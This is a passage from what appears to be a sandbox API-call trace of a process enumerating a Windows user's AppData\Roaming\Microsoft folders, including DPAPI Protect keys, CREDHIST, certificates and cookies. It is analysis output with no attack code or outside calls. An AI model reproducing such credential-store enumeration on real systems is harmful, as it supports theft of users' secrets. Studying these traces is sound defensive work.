lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", lpFilePart=0x0) returned 0x32 [0281.496] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.496] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.496] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0281.496] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.496] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", lpFilePart=0x0) returned 0x34 [0281.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.497] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", lpFilePart=0x0) returned 0x34 [0281.497] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.497] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.497] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x47b8e1c0, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0281.497] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0281.497] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x510a9850, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x510a9850, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-4219442223-4223814209-3835049652-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0281.497] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bba3b70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7bba3b70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x47bf4a60, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0281.497] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.497] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.497] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpFilePart=0x0) returned 0x3f [0281.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.498] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpFilePart=0x0) returned 0x3f [0281.498] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.498] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.498] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0281.498] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0281.498] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.499] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", lpFilePart=0x0) returned 0x36 [0281.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.499] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", lpFilePart=0x0) returned 0x36 [0281.500] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.500] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.500] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b354e30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b354e30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b4aba90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4615, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0281.500] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.500] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.501] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", lpFilePart=0x0) returned 0x33 [0281.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.501] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", lpFilePart=0x0) returned 0x33 [0281.501] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.502] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.502] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426e0920, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 1 [0281.502] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.502] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.503] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", lpFilePart=0x0) returned 0x34 [0281.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.503] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", lpFilePart=0x0) returned 0x34 [0281.503] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.504] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.504] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0281.504] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0281.504] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0281.505] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e87ab80, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e87ab80, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0281.505] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0281.505] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0281.505] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x75cc2be0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0281.505] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa3e54ba0, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xa3e54ba0, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0281.506] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0281.506] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e803170, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0281.506] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x794f55f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0281.506] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0281.506] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 0 [0281.507] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.507] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", lpFilePart=0x0) returned 0x31 [0281.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.507] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", lpFilePart=0x0) returned 0x31 [0281.508] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, 